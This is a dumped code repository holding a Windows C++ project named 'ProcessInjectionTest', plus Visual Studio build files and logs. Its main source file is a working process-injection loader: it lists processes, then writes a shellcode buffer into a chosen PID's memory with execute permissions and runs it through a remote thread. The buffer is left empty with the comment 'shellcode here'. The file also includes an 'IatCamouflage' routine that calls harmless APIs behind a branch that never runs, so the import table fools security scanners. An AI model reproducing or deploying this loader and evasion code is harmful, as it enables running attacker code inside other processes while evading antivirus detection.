├── 2024-11-21 18-14-52.mp4
├── ProcessInjectionTest
    ├── ProcessInjectionTest.sln
    ├── ProcessInjectionTest
    │   ├── ProcessInjectionTest.cpp
    │   ├── ProcessInjectionTest.vcxproj
    │   ├── ProcessInjectionTest.vcxproj.filters
    │   ├── ProcessInjectionTest.vcxproj.user
    │   └── x64
    │   │   ├── Debug
    │   │       ├── ProcessI.dc860221.tlog
    │   │       │   ├── CL.command.1.tlog
    │   │       │   ├── CL.read.1.tlog
    │   │       │   ├── CL.write.1.tlog
    │   │       │   ├── Cl.items.tlog
    │   │       │   ├── ProcessInjectionTest.lastbuildstate
    │   │       │   ├── link.command.1.tlog
    │   │       │   ├── link.read.1.tlog
    │   │       │   ├── link.secondary.1.tlog
    │   │       │   └── link.write.1.tlog
    │   │       ├── ProcessInjectionTest.exe.recipe
    │   │       ├── ProcessInjectionTest.ilk
    │   │       ├── ProcessInjectionTest.log
    │   │       ├── ProcessInjectionTest.obj
    │   │       ├── vc143.idb
    │   │       └── vc143.pdb
    │   │   └── Release
    │   │       ├── ProcessI.dc860221.tlog
    │   │           ├── CL.command.1.tlog
    │   │           ├── CL.read.1.tlog
    │   │           ├── CL.write.1.tlog
    │   │           ├── Cl.items.tlog
    │   │           ├── ProcessInjectionTest.lastbuildstate
    │   │           ├── link.command.1.tlog
    │   │           ├── link.read.1.tlog
    │   │           ├── link.secondary.1.tlog
    │   │           └── link.write.1.tlog
    │   │       ├── ProcessInjectionTest.exe.recipe
    │   │       ├── ProcessInjectionTest.iobj
    │   │       ├── ProcessInjectionTest.ipdb
    │   │       ├── ProcessInjectionTest.log
    │   │       ├── ProcessInjectionTest.obj
    │   │       └── vc143.pdb
    └── x64
    │   ├── Debug
    │       ├── ProcessInjectionTest.exe
    │       └── ProcessInjectionTest.pdb
    │   └── Release
    │       ├── ProcessInjectionTest.exe
    │       └── ProcessInjectionTest.pdb
└── README.md


/2024-11-21 18-14-52.mp4:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Nicolas-Arsenault/run-shellcode-in-memory/55f4d16d7758adaf4e3b952fffdd46c474d2b8c0/2024-11-21 18-14-52.mp4


--------------------------------------------------------------------------------
/ProcessInjectionTest/ProcessInjectionTest.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio Version 17
 4 | VisualStudioVersion = 17.11.35303.130
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ProcessInjectionTest", "ProcessInjectionTest\ProcessInjectionTest.vcxproj", "{DC860221-2F2E-4A18-8E51-EA6379AE5F76}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|x64 = Debug|x64
11 | 		Debug|x86 = Debug|x86
12 | 		Release|x64 = Release|x64
13 | 		Release|x86 = Release|x86
14 | 	EndGlobalSection
15 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | 		{DC860221-2F2E-4A18-8E51-EA6379AE5F76}.Debug|x64.ActiveCfg = Debug|x64
17 | 		{DC860221-2F2E-4A18-8E51-EA6379AE5F76}.Debug|x64.Build.0 = Debug|x64
18 | 		{DC860221-2F2E-4A18-8E51-EA6379AE5F76}.Debug|x86.ActiveCfg = Debug|Win32
19 | 		{DC860221-2F2E-4A18-8E51-EA6379AE5F76}.Debug|x86.Build.0 = Debug|Win32
20 | 		{DC860221-2F2E-4A18-8E51-EA6379AE5F76}.Release|x64.ActiveCfg = Release|x64
21 | 		{DC860221-2F2E-4A18-8E51-EA6379AE5F76}.Release|x64.Build.0 = Release|x64
22 | 		{DC860221-2F2E-4A18-8E51-EA6379AE5F76}.Release|x86.ActiveCfg = Release|Win32
23 | 		{DC860221-2F2E-4A18-8E51-EA6379AE5F76}.Release|x86.Build.0 = Release|Win32
24 | 	EndGlobalSection
25 | 	GlobalSection(SolutionProperties) = preSolution
26 | 		HideSolutionNode = FALSE
27 | 	EndGlobalSection
28 | 	GlobalSection(ExtensibilityGlobals) = postSolution
29 | 		SolutionGuid = {E01D09EC-FE3A-4CC2-AF1B-C3E94750CF5A}
30 | 	EndGlobalSection
31 | EndGlobal
32 | 


--------------------------------------------------------------------------------
/ProcessInjectionTest/ProcessInjectionTest/ProcessInjectionTest.cpp:
--------------------------------------------------------------------------------
  1 | #include <iostream>
  2 | #include <windows.h>
  3 | #include <stdio.h>
  4 | #include <tchar.h>
  5 | #include <psapi.h>
  6 | #include <shlobj.h>
  7 | 
  8 | using namespace std;
  9 | 
 10 | void printProcessNameAndID(DWORD processID) 
 11 | {
 12 |     TCHAR szProcessName[MAX_PATH] = TEXT("<uinknown>"); //store process name. An array. MAX_PATH is the max length of a path.
 13 | 
 14 |     HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, processID); //open the process using its processID
 15 | 
 16 |     if (NULL != hProcess) 
 17 |     {
 18 |         HMODULE hMod; //handle to a module, ex: an exe file within a process
 19 |         DWORD cbNeeded; //the memory size needed to store module info 
 20 | 
 21 |         if (EnumProcessModules(hProcess, &hMod, sizeof(hMod), &cbNeeded)) 
 22 |         {
 23 |             GetModuleBaseName(hProcess, hMod, szProcessName, sizeof(szProcessName) / sizeof(TCHAR));
 24 |         }
 25 |     }
 26 | 
 27 |     _tprintf(TEXT("%s  (PID: %u)\n"), szProcessName, processID); //print process name + pid
 28 | 
 29 |     CloseHandle(hProcess); //close handle
 30 | }
 31 | 
 32 | int findProcess() 
 33 | {
 34 |     DWORD aProcesses[1024], cbNeeded, cProcesses;
 35 |     unsigned int i;
 36 | 
 37 |     //gets the process IDs of all running processes
 38 |     if (!EnumProcesses(aProcesses, sizeof(aProcesses), &cbNeeded)) 
 39 |     {
 40 |         return 1;
 41 |     }
 42 | 
 43 |     cProcesses = cbNeeded / sizeof(DWORD); //calculate number of processes
 44 | 
 45 |     for (i = 0; i < cProcesses; i++) 
 46 |     {
 47 |         if (aProcesses[i] != 0)  //if the process ID is valid
 48 |         {
 49 |             printProcessNameAndID(aProcesses[i]); //print process name and ID (call la func)
 50 |         }
 51 |     }
 52 | 
 53 |     return 0;
 54 | }
 55 | 
 56 | void inject(DWORD pid) 
 57 | {
 58 |     unsigned char wannabe[] =
 59 |         ""; //shellcode here
 60 |     HANDLE hProcess; 
 61 |     DWORD dwProcessId = pid; //le pid
 62 | 
 63 |     hProcess = OpenProcess(PROCESS_VM_WRITE | PROCESS_VM_OPERATION, FALSE, dwProcessId); //open le process pour écriture
 64 | 
 65 |     if (hProcess == NULL) 
 66 |     {
 67 |         cout << "\nUnable to Identify the Process ID\n";
 68 |         return;
 69 |     }
 70 | 
 71 |     SIZE_T dwSize = sizeof(wannabe); // Calculate the size of the shellcode to be injected
 72 |     DWORD flAllocationType = (MEM_COMMIT | MEM_RESERVE);  // Memory allocation flags
 73 |     DWORD flProtect = PAGE_EXECUTE_READWRITE; // Set memory protection to execute,read, and write
 74 | 
 75 |     LPVOID lpAlloc = VirtualAllocEx(hProcess, NULL, dwSize, flAllocationType, flProtect); //allocate memory in the process, to store the shellcode
 76 |     if (lpAlloc == NULL) 
 77 |     {
 78 |         printf("\nFailed to Allocate the memory\n");
 79 |         DWORD dwError = GetLastError();
 80 |         printf("Error Code: %lu\n", dwError);
 81 |         CloseHandle(hProcess);
 82 |         return;
 83 |     }
 84 |     printf("Allocated the memory into virtual space\n");
 85 | 
 86 |     LPVOID lpBaseAddress = lpAlloc; //address for the allocated memory
 87 |     LPCVOID lpBuffer = wannabe; //set the shellcode as the buffer to wrtie
 88 |     SIZE_T nSize = sizeof(wannabe); //size of shellcode
 89 |     SIZE_T lpNumberOfBytesWritten; //store numberofBytes written
 90 | 
 91 |     BOOL bWriteBuffer = WriteProcessMemory(hProcess, lpBaseAddress, lpBuffer, nSize, &lpNumberOfBytesWritten); //write the shellcode in the memory
 92 | 
 93 |     if (bWriteBuffer == FALSE) 
 94 |     {
 95 |         DWORD dwError = GetLastError();
 96 |         printf("Failed to Write Memory to the process. Error Code: %lu\n", dwError);
 97 |         CloseHandle(hProcess);
 98 |         return;
 99 |     }
100 | 
101 |     printf("Successfully wrote memory to the process\n");
102 | 
103 |     //params for creating the thread (which will execute the code)
104 |     LPSECURITY_ATTRIBUTES lpThreadAttributes = NULL;
105 |     SIZE_T dwStackSize = 0;
106 |     LPTHREAD_START_ROUTINE lpStartAddress = (LPTHREAD_START_ROUTINE)lpAlloc;
107 |     LPVOID lpParameter = NULL;
108 |     DWORD dwCreationFlags = 0;
109 |     LPPROC_THREAD_ATTRIBUTE_LIST lpAttributeList = 0;
110 |     LPDWORD lpThreadId = NULL;
111 | 
112 |     //create the thread
113 |     HANDLE hThread = CreateRemoteThreadEx(hProcess, lpThreadAttributes, dwStackSize, lpStartAddress, lpParameter, dwCreationFlags, lpAttributeList, lpThreadId);
114 | 
115 |     if (hThread == NULL) 
116 |     {
117 |         DWORD dwError = GetLastError();
118 |         printf("Failed to create remote thread. Error Code: %lu\n", dwError);
119 |         CloseHandle(hProcess);
120 |         return;
121 |     }
122 | 
123 |     //wait for the thread to finish executing
124 |     WaitForSingleObject(hThread, INFINITE);
125 | 
126 |     printf("Successfully injected into process %lu\n", pid);
127 | 
128 |     CloseHandle(hThread); //close thread
129 |     CloseHandle(hProcess); //close handle to process
130 | }
131 | 
132 | int RandomCompileTimeSeed(void)
133 | {
134 | 	return '0' * -40271 +
135 | 		__TIME__[7] * 1 +
136 | 		__TIME__[6] * 10 +
137 | 		__TIME__[4] * 60 +
138 | 		__TIME__[3] * 600 +
139 | 		__TIME__[1] * 3600 +
140 | 		__TIME__[0] * 36000;
141 | }
142 | 
143 | PVOID Helper(PVOID* ppAddress) {
144 | 
145 | 	PVOID pAddress = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 0xFF);
146 | 	if (!pAddress)
147 | 		return NULL;
148 | 
149 | 	// setting the first 4 bytes in pAddress to be equal to a random number (less than 255)
150 | 	*(int*)pAddress = RandomCompileTimeSeed() % 0xFF;
151 | 
152 | 	// saving the base address by pointer, and returning it 
153 | 	*ppAddress = pAddress;
154 | 	return pAddress;
155 | }
156 | 
157 | void AddKernel32ToIat() {
158 |     // Calling a simple Kernel32.dll function: GetCurrentProcessId
159 |     DWORD processID = GetCurrentProcessId();
160 |     std::wcout << L"Current Process ID: " << processID << std::endl;
161 | }
162 | 
163 | void IatCamouflage() {
164 | 
165 | 	PVOID		pAddress = NULL;
166 | 	int* A = (int*)Helper(&pAddress);
167 | 
168 | 	// Impossible if-statement that will never run
169 | 	if (*A > 350) {
170 | 
171 | 		// some random whitelisted WinAPIs
172 | 		unsigned __int64 i = MessageBoxA(NULL, NULL, NULL, NULL);
173 | 		i = GetLastError();
174 | 		i = SetCriticalSectionSpinCount(NULL, NULL);
175 | 		i = GetWindowContextHelpId(NULL);
176 | 		i = GetWindowLongPtrW(NULL, NULL);
177 | 		i = RegisterClassW(NULL);
178 | 		i = IsWindowVisible(NULL);
179 | 		i = ConvertDefaultLocale(NULL);
180 | 		i = MultiByteToWideChar(NULL, NULL, NULL, NULL, NULL, NULL);
181 | 		i = IsDialogMessageW(NULL, NULL);
182 | 	}
183 | 
184 | 	// Freeing the buffer allocated in 'Helper'
185 | 	HeapFree(GetProcessHeap(), 0, pAddress);
186 | }
187 | 
188 | int main() 
189 | {
190 |     IatCamouflage();
191 | 
192 |     AddKernel32ToIat();
193 |     
194 |     findProcess(); //print processes
195 | 
196 |     DWORD pid;
197 |     cout << "Enter process ID: ";
198 |     cin >> pid;
199 | 
200 |     inject(pid); //inject shellcode
201 | }
202 | 


--------------------------------------------------------------------------------
/ProcessInjectionTest/ProcessInjectionTest/ProcessInjectionTest.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|Win32">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>Win32</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Release|Win32">
  9 |       <Configuration>Release</Configuration>
 10 |       <Platform>Win32</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="Debug|x64">
 13 |       <Configuration>Debug</Configuration>
 14 |       <Platform>x64</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="Release|x64">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>x64</Platform>
 19 |     </ProjectConfiguration>
 20 |   </ItemGroup>
 21 |   <PropertyGroup Label="Globals">
 22 |     <VCProjectVersion>17.0</VCProjectVersion>
 23 |     <Keyword>Win32Proj</Keyword>
 24 |     <ProjectGuid>{dc860221-2f2e-4a18-8e51-ea6379ae5f76}</ProjectGuid>
 25 |     <RootNamespace>ProcessInjectionTest</RootNamespace>
 26 |     <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
 27 |   </PropertyGroup>
 28 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 29 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 30 |     <ConfigurationType>Application</ConfigurationType>
 31 |     <UseDebugLibraries>true</UseDebugLibraries>
 32 |     <PlatformToolset>v143</PlatformToolset>
 33 |     <CharacterSet>Unicode</CharacterSet>
 34 |   </PropertyGroup>
 35 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 36 |     <ConfigurationType>Application</ConfigurationType>
 37 |     <UseDebugLibraries>false</UseDebugLibraries>
 38 |     <PlatformToolset>v143</PlatformToolset>
 39 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 40 |     <CharacterSet>Unicode</CharacterSet>
 41 |   </PropertyGroup>
 42 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
 43 |     <ConfigurationType>Application</ConfigurationType>
 44 |     <UseDebugLibraries>true</UseDebugLibraries>
 45 |     <PlatformToolset>v143</PlatformToolset>
 46 |     <CharacterSet>Unicode</CharacterSet>
 47 |   </PropertyGroup>
 48 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 49 |     <ConfigurationType>Application</ConfigurationType>
 50 |     <UseDebugLibraries>false</UseDebugLibraries>
 51 |     <PlatformToolset>v143</PlatformToolset>
 52 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 53 |     <CharacterSet>Unicode</CharacterSet>
 54 |   </PropertyGroup>
 55 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 56 |   <ImportGroup Label="ExtensionSettings">
 57 |   </ImportGroup>
 58 |   <ImportGroup Label="Shared">
 59 |   </ImportGroup>
 60 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 61 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 62 |   </ImportGroup>
 63 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 64 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 65 |   </ImportGroup>
 66 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 67 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 68 |   </ImportGroup>
 69 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 70 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 71 |   </ImportGroup>
 72 |   <PropertyGroup Label="UserMacros" />
 73 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 74 |     <ClCompile>
 75 |       <WarningLevel>Level3</WarningLevel>
 76 |       <SDLCheck>true</SDLCheck>
 77 |       <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 78 |       <ConformanceMode>true</ConformanceMode>
 79 |     </ClCompile>
 80 |     <Link>
 81 |       <SubSystem>Console</SubSystem>
 82 |       <GenerateDebugInformation>true</GenerateDebugInformation>
 83 |     </Link>
 84 |   </ItemDefinitionGroup>
 85 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 86 |     <ClCompile>
 87 |       <WarningLevel>Level3</WarningLevel>
 88 |       <FunctionLevelLinking>true</FunctionLevelLinking>
 89 |       <IntrinsicFunctions>true</IntrinsicFunctions>
 90 |       <SDLCheck>true</SDLCheck>
 91 |       <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 92 |       <ConformanceMode>true</ConformanceMode>
 93 |     </ClCompile>
 94 |     <Link>
 95 |       <SubSystem>Console</SubSystem>
 96 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
 97 |       <OptimizeReferences>true</OptimizeReferences>
 98 |       <GenerateDebugInformation>true</GenerateDebugInformation>
 99 |     </Link>
100 |   </ItemDefinitionGroup>
101 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
102 |     <ClCompile>
103 |       <WarningLevel>Level3</WarningLevel>
104 |       <SDLCheck>true</SDLCheck>
105 |       <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
106 |       <ConformanceMode>true</ConformanceMode>
107 |     </ClCompile>
108 |     <Link>
109 |       <SubSystem>Console</SubSystem>
110 |       <GenerateDebugInformation>true</GenerateDebugInformation>
111 |     </Link>
112 |   </ItemDefinitionGroup>
113 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
114 |     <ClCompile>
115 |       <WarningLevel>Level3</WarningLevel>
116 |       <FunctionLevelLinking>true</FunctionLevelLinking>
117 |       <IntrinsicFunctions>true</IntrinsicFunctions>
118 |       <SDLCheck>true</SDLCheck>
119 |       <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
120 |       <ConformanceMode>true</ConformanceMode>
121 |     </ClCompile>
122 |     <Link>
123 |       <SubSystem>Console</SubSystem>
124 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
125 |       <OptimizeReferences>true</OptimizeReferences>
126 |       <GenerateDebugInformation>true</GenerateDebugInformation>
127 |     </Link>
128 |   </ItemDefinitionGroup>
129 |   <ItemGroup>
130 |     <ClCompile Include="ProcessInjectionTest.cpp" />
131 |   </ItemGroup>
132 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
133 |   <ImportGroup Label="ExtensionTargets">
134 |   </ImportGroup>
135 | </Project>


--------------------------------------------------------------------------------
/ProcessInjectionTest/ProcessInjectionTest/ProcessInjectionTest.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="Fichiers sources">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="Fichiers d%27en-tête">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="Fichiers de ressources">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <ClCompile Include="ProcessInjectionTest.cpp">
19 |       <Filter>Fichiers sources</Filter>
20 |     </ClCompile>
21 |   </ItemGroup>
22 | </Project>


--------------------------------------------------------------------------------
/ProcessInjectionTest/ProcessInjectionTest/ProcessInjectionTest.vcxproj.user:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8"?>
2 | <Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3 |   <PropertyGroup />
4 | </Project>


--------------------------------------------------------------------------------
/ProcessInjectionTest/ProcessInjectionTest/x64/Debug/ProcessI.dc860221.tlog/CL.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Nicolas-Arsenault/run-shellcode-in-memory/55f4d16d7758adaf4e3b952fffdd46c474d2b8c0/ProcessInjectionTest/ProcessInjectionTest/x64/Debug/ProcessI.dc860221.tlog/CL.command.1.tlog


--------------------------------------------------------------------------------
/ProcessInjectionTest/ProcessInjectionTest/x64/Debug/ProcessI.dc860221.tlog/CL.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Nicolas-Arsenault/run-shellcode-in-memory/55f4d16d7758adaf4e3b952fffdd46c474d2b8c0/ProcessInjectionTest/ProcessInjectionTest/x64/Debug/ProcessI.dc860221.tlog/CL.read.1.tlog


--------------------------------------------------------------------------------
/ProcessInjectionTest/ProcessInjectionTest/x64/Debug/ProcessI.dc860221.tlog/CL.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Nicolas-Arsenault/run-shellcode-in-memory/55f4d16d7758adaf4e3b952fffdd46c474d2b8c0/ProcessInjectionTest/ProcessInjectionTest/x64/Debug/ProcessI.dc860221.tlog/CL.write.1.tlog


--------------------------------------------------------------------------------
/ProcessInjectionTest/ProcessInjectionTest/x64/Debug/ProcessI.dc860221.tlog/Cl.items.tlog:
--------------------------------------------------------------------------------
1 | C:\Users\Ratatouille\source\repos\ProcessInjectionTest\ProcessInjectionTest\ProcessInjectionTest.cpp;C:\Users\Ratatouille\source\repos\ProcessInjectionTest\ProcessInjectionTest\x64\Debug\ProcessInjectionTest.obj
2 | 


--------------------------------------------------------------------------------
/ProcessInjectionTest/ProcessInjectionTest/x64/Debug/ProcessI.dc860221.tlog/ProcessInjectionTest.lastbuildstate:
--------------------------------------------------------------------------------
1 | PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.41.34120:TargetPlatformVersion=10.0.22621.0:
2 | Debug|x64|C:\Users\Ratatouille\source\repos\ProcessInjectionTest\|
3 | 


--------------------------------------------------------------------------------
/ProcessInjectionTest/ProcessInjectionTest/x64/Debug/ProcessI.dc860221.tlog/link.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Nicolas-Arsenault/run-shellcode-in-memory/55f4d16d7758adaf4e3b952fffdd46c474d2b8c0/ProcessInjectionTest/ProcessInjectionTest/x64/Debug/ProcessI.dc860221.tlog/link.command.1.tlog


--------------------------------------------------------------------------------
/ProcessInjectionTest/ProcessInjectionTest/x64/Debug/ProcessI.dc860221.tlog/link.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Nicolas-Arsenault/run-shellcode-in-memory/55f4d16d7758adaf4e3b952fffdd46c474d2b8c0/ProcessInjectionTest/ProcessInjectionTest/x64/Debug/ProcessI.dc860221.tlog/link.read.1.tlog


--------------------------------------------------------------------------------
/ProcessInjectionTest/ProcessInjectionTest/x64/Debug/ProcessI.dc860221.tlog/link.secondary.1.tlog:
--------------------------------------------------------------------------------
1 | ^C:\USERS\RATATOUILLE\SOURCE\REPOS\PROCESSINJECTIONTEST\PROCESSINJECTIONTEST\X64\DEBUG\PROCESSINJECTIONTEST.OBJ
2 | C:\Users\Ratatouille\source\repos\ProcessInjectionTest\ProcessInjectionTest\x64\Debug\ProcessInjectionTest.ilk
3 | 


--------------------------------------------------------------------------------
/ProcessInjectionTest/ProcessInjectionTest/x64/Debug/ProcessI.dc860221.tlog/link.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Nicolas-Arsenault/run-shellcode-in-memory/55f4d16d7758adaf4e3b952fffdd46c474d2b8c0/ProcessInjectionTest/ProcessInjectionTest/x64/Debug/ProcessI.dc860221.tlog/link.write.1.tlog


--------------------------------------------------------------------------------
/ProcessInjectionTest/ProcessInjectionTest/x64/Debug/ProcessInjectionTest.exe.recipe:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project>
 3 |   <ProjectOutputs>
 4 |     <ProjectOutput>
 5 |       <FullPath>C:\Users\Ratatouille\source\repos\ProcessInjectionTest\x64\Debug\ProcessInjectionTest.exe</FullPath>
 6 |     </ProjectOutput>
 7 |   </ProjectOutputs>
 8 |   <ContentFiles />
 9 |   <SatelliteDlls />
10 |   <NonRecipeFileRefs />
11 | </Project>


--------------------------------------------------------------------------------
/ProcessInjectionTest/ProcessInjectionTest/x64/Debug/ProcessInjectionTest.ilk:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Nicolas-Arsenault/run-shellcode-in-memory/55f4d16d7758adaf4e3b952fffdd46c474d2b8c0/ProcessInjectionTest/ProcessInjectionTest/x64/Debug/ProcessInjectionTest.ilk


--------------------------------------------------------------------------------
/ProcessInjectionTest/ProcessInjectionTest/x64/Debug/ProcessInjectionTest.log:
--------------------------------------------------------------------------------
1 |   ProcessInjectionTest.cpp
2 | C:\Users\Ratatouille\source\repos\ProcessInjectionTest\ProcessInjectionTest\ProcessInjectionTest.cpp(93,10): warning C4101: 'bInHandle' : variable locale non référencée
3 |   ProcessInjectionTest.vcxproj -> C:\Users\Ratatouille\source\repos\ProcessInjectionTest\x64\Debug\ProcessInjectionTest.exe
4 | 


--------------------------------------------------------------------------------
/ProcessInjectionTest/ProcessInjectionTest/x64/Debug/ProcessInjectionTest.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Nicolas-Arsenault/run-shellcode-in-memory/55f4d16d7758adaf4e3b952fffdd46c474d2b8c0/ProcessInjectionTest/ProcessInjectionTest/x64/Debug/ProcessInjectionTest.obj


--------------------------------------------------------------------------------
/ProcessInjectionTest/ProcessInjectionTest/x64/Debug/vc143.idb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Nicolas-Arsenault/run-shellcode-in-memory/55f4d16d7758adaf4e3b952fffdd46c474d2b8c0/ProcessInjectionTest/ProcessInjectionTest/x64/Debug/vc143.idb


--------------------------------------------------------------------------------
/ProcessInjectionTest/ProcessInjectionTest/x64/Debug/vc143.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Nicolas-Arsenault/run-shellcode-in-memory/55f4d16d7758adaf4e3b952fffdd46c474d2b8c0/ProcessInjectionTest/ProcessInjectionTest/x64/Debug/vc143.pdb


--------------------------------------------------------------------------------
/ProcessInjectionTest/ProcessInjectionTest/x64/Release/ProcessI.dc860221.tlog/CL.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Nicolas-Arsenault/run-shellcode-in-memory/55f4d16d7758adaf4e3b952fffdd46c474d2b8c0/ProcessInjectionTest/ProcessInjectionTest/x64/Release/ProcessI.dc860221.tlog/CL.command.1.tlog


--------------------------------------------------------------------------------
/ProcessInjectionTest/ProcessInjectionTest/x64/Release/ProcessI.dc860221.tlog/CL.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Nicolas-Arsenault/run-shellcode-in-memory/55f4d16d7758adaf4e3b952fffdd46c474d2b8c0/ProcessInjectionTest/ProcessInjectionTest/x64/Release/ProcessI.dc860221.tlog/CL.read.1.tlog


--------------------------------------------------------------------------------
/ProcessInjectionTest/ProcessInjectionTest/x64/Release/ProcessI.dc860221.tlog/CL.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Nicolas-Arsenault/run-shellcode-in-memory/55f4d16d7758adaf4e3b952fffdd46c474d2b8c0/ProcessInjectionTest/ProcessInjectionTest/x64/Release/ProcessI.dc860221.tlog/CL.write.1.tlog


--------------------------------------------------------------------------------
/ProcessInjectionTest/ProcessInjectionTest/x64/Release/ProcessI.dc860221.tlog/Cl.items.tlog:
--------------------------------------------------------------------------------
1 | C:\Users\Ratatouille\source\repos\ProcessInjectionTest\ProcessInjectionTest\ProcessInjectionTest.cpp;C:\Users\Ratatouille\source\repos\ProcessInjectionTest\ProcessInjectionTest\x64\Release\ProcessInjectionTest.obj
2 | 


--------------------------------------------------------------------------------
/ProcessInjectionTest/ProcessInjectionTest/x64/Release/ProcessI.dc860221.tlog/ProcessInjectionTest.lastbuildstate:
--------------------------------------------------------------------------------
1 | PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.41.34120:TargetPlatformVersion=10.0.22621.0:
2 | Release|x64|C:\Users\Ratatouille\source\repos\ProcessInjectionTest\|
3 | 


--------------------------------------------------------------------------------
